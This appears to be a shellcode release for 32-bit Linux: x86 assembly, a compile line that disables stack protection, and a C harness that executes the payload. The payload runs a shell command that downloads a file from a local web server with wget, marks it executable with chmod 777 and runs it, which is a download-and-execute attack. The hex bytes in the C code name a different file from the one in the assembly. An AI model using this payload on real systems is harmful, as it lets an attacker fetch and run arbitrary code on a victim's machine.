_exec:
pop ecx
mov edi, ecx
xor ecx, ecx
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
push word 0x632d
mov esi , esp
push eax
push edi
push esi
push ebx
mov ecx, esp
mov al, 11
int 0x80
_execline:
call _exec
line db "/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile", 0x0a
-----------------------------[Compile]---------------------------------------------
gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
-----------------------------[C-Code]-----------------------------
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x33\x41\x64\x72\x20\x26\x26\x20\x2f\x62\x69\x6e\x2f\x63\x68\x6d\x6f\x64\x20\x37\x37\x37\x20\x33\x41\x64\x72\x20\x26\x26\x20\x2e\x2f\x33\x41\x64\x72\x0a";
void main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}